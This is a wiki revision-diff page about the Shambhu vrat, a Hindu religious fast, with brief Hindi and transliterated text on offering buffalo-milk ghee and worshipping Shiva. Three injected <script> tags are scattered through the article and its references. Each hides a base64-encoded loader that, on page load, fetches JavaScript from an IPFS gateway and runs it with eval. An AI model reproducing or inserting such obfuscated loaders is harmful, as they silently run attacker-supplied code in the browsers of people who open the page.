Difference between revisions of "शम्भु व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*जो व्यक्ति एक वर्ष तक [[भैंस]] के दूध से बने [[घी]] के दो सहस्र पलों को अग्नि में होम करता है, वह नन्दी की स्थिति पा लेता है।<ref>संवत्सरव्रत</ref>
 
*जो व्यक्ति एक वर्ष तक [[भैंस]] के दूध से बने [[घी]] के दो सहस्र पलों को अग्नि में होम करता है, वह नन्दी की स्थिति पा लेता है।<ref>संवत्सरव्रत</ref>
*शम्भुव्रत में [[देवता]] [[शिव]] की पूजा करनी चाहिए।<ref>हेमाद्रि (व्रतखण्ड 2, 866-867, [[पद्म पुराण]] से उद्धरण)</ref>
+
*शम्भुव्रत में [[देवता]] [[शिव]] की पूजा करनी चाहिए।<ref>हेमाद्रि (व्रतखण्ड 2, 866-867, [[पद्म पुराण]] से उद्धरण</ref>
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Latest revision as of 13:00, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jo vyakti ek varsh tak bhaians ke doodh se bane ghi ke do sahasr paloan ko agni mean hom karata hai, vah nandi ki sthiti pa leta hai.[1]
  • shambhuvrat mean devata shiv ki pooja karani chahie.[2]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. sanvatsaravrat
  2. hemadri (vratakhand 2, 866-867, padm puran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>